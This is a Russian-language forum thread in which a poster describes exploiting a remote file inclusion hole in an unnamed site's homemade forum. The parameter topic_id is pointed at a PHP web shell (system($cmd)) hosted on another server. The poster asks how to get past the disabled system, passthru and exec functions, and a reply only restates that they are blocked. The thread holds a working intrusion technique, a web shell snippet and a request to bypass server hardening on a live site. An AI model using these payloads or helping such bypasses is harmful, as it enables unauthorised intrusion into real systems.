Есть некий сайт. На его самописном форуме ссылки на темы имеют вид типа: topic_id=num. Проверил на наличие num.php - существует. При чём тот самый. Далее в браузере ввожу: http://имя_сайта/forum/topic_id=http://www.securitylab.ru Загрузилась главная страница секлаба. Далее: на сайт site.com забрасываю shell.php с таким содержимым: nbsp; nbsp; nbsp;lt;? system($cmd); ? gt; Пишу: http://имя_сайта/forum/topic_id=http://site.com/shell.php cm d=ls получаю в ответ: Warning: system() has been disabled for security reasons in http://site.com/shell.php on line 2
Тогда в файле shell.php заменил cmd на passthru. В ответ: Warning: passthru() has been disabled for security reasons in http://site.com/shell.php on line 1
Попытался подрубить phpshell - уже кем-то написанный. Выдаёт: Warning: exec() has been disabled for security reasons in http://site.com/phpsh.php on line 82
Как быть?
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
Warning: *() has been disabled for security reasons Кажется ясным языком написали, хоть и на английском "По соображениям безопасности данная функция была заблокирована"